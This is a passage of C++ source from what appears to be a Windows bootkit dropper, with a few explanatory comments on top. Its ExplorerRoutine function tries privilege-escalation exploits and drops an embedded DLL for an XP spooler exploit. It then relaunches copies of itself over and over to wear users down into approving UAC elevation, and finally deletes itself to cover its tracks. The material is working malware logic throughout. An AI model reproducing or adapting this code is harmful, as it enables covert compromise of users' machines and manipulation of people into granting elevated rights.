//     TakePrivileges() — results 0 and 2 clear bRun (no install attempt).
//  2. ExplorerMain() when bRun. If that fails and TakePrivileges() was not
//     called yet, call it once and repeat ExplorerMain().
//  3. Still failing, image is not a DLL, OS major version 5: write the
//     embedded "DROPER_DLL" section to a temp file and pass it to
//     SpoolerBypass().
//  4. Still failing: copy the dropper (FileToDelete) to a temp path named
//     "<DROPER_NAME_PREFIX><tmp>.exe" with a saved .manifest and run it via
//     ShellExecuteExA with ARGV_UAC_RUN, up to 10 launches per round (a round
//     stops early on exit code 0 or a failed ShellExecuteEx); rounds repeat
//     until the file PathBkFile exists.
//  5. One more ExplorerMain(), then a DeleteDropper thread; ExitProcess(0)
//     when dwExplorerSelf is set.
// Host-observable artifacts: temp files "<prefix>*.exe" / "*.manifest",
// repeated UAC prompts for those copies, a dropped DLL in the temp directory
// on OS version 5, and the PathBkFile marker.
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
    //
    // Create a separate thread for the deletion, since deleting the dropper can take more than a minute.
    //
    BOOL bRun = TRUE;
    BOOL bRet = FALSE;
    BOOL IsUsedExploit = FALSE;
    OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};
    UnhookDlls();
    BuildImport((PVOID)GetImageBase());
    PP_DPRINTF(L"ExplorerRoutine: started");
    if (! IsUserAdmin() )
    {
        PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
        switch ( TakePrivileges() )
        {
            case 0:
            case 2:
                bRun = FALSE;
                break;
        };
        PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
        IsUsedExploit = TRUE; // In principle this is always TRUE
    };
    if ( bRun )
    {
        PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
        bRet = ExplorerMain();
        PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
    }
    /* If we have admin rights but did not use the exploits and the install
       failed, use the exploits and do the install again */
    if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
    {
        PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");
        IsUsedExploit = TRUE;
        switch ( TakePrivileges() )
        {
            case 0:
            case 2:
                bRun = FALSE;
                break;
        };
        if ( bRun )
        {
            PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
            bRet = ExplorerMain();
            PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
        }
    };
    pGetVersionExA(&OSVer);
    /* Drop the DLL to disk and use the spooler exploit, XP only */
    if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
    {
        PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");
        DWORD DropSize = 0;
        PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize);
        if ( DropImage && DropSize)
        {
            PCHAR DropFile = File::GetTempNameA();
            File::WriteBufferA(DropFile,DropImage,DropSize);
            SpoolerBypass(DropFile);
            STR::Free(DropFile);
        };
    };
    /* Launch a copy of the dropper many times, asking for elevated rights. */
    if ( bRet == FALSE )
    {
        PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");
        PCHAR tmpexe,dir,file ;
        PCHAR tmp_manifest;
        PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
        if ( NamePrefix )
        do
        {
            tmpexe = File::GetTempNameA();
            tmp_manifest = STR::Alloc(MAX_PATH+1);
            dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
            file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
            if ( tmp_manifest && dir && file)
            {
                // Rebuild the temp name as <dir>\<NamePrefix><file>.exe and
                // derive the manifest path from it.
                STR::Free(tmpexe);
                tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
                if ( ! tmpexe ) return 0;
                m_lstrcpy(tmp_manifest,tmpexe);
                m_lstrcat(tmp_manifest,".manifest");
            };
            if ( tmpexe && tmp_manifest )
            if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
            {
                DWORD dwCode = -1;
                SHELLEXECUTEINFOA ExecInfo;
                // tmp_manifest is reused here as the parameter string "<tmpexe> <ARGV_UAC_RUN>".
                m_lstrcpy(tmp_manifest,tmpexe);
                m_lstrcat(tmp_manifest," ");
                m_lstrcat(tmp_manifest,ARGV_UAC_RUN);
                ExecInfo.cbSize = sizeof(ExecInfo);
                ExecInfo.lpFile = tmpexe;
                ExecInfo.lpParameters = tmp_manifest;
                ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
                for ( int i = 0; i < 10; ++i )
                {
                    PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);
                    if ( pShellExecuteExA(&ExecInfo) == FALSE ) break;
                    pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
                    pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);
                    if ( dwCode == 0 )
                    {
                        PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
                        break;
                    }
                }
            };
            if ( tmpexe ) STR::Free(tmpexe);
            if ( tmp_manifest ) STR::Free(tmp_manifest);
            if ( dir ) STR::Free(dir);
            if ( file ) STR::Free(file);
        } while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do; loop until the bootkit file appears
        if ( NamePrefix ) STR::Free(NamePrefix);
    };
    /* If the install was unsuccessful, try once more in case we get lucky */
    if ( bRet == FALSE)
    {
        PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
        bRet = ExplorerMain();
        PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
    }
    /* Delete the dropper */
    PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
    // The thread handle is closed immediately; the deletion runs detached.
    pCloseHandle(StartThread(DeleteDropper,NULL));
    if ( dwExplorerSelf )
    {
        PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
        pExitProcess(0);
    }
    return 0;
}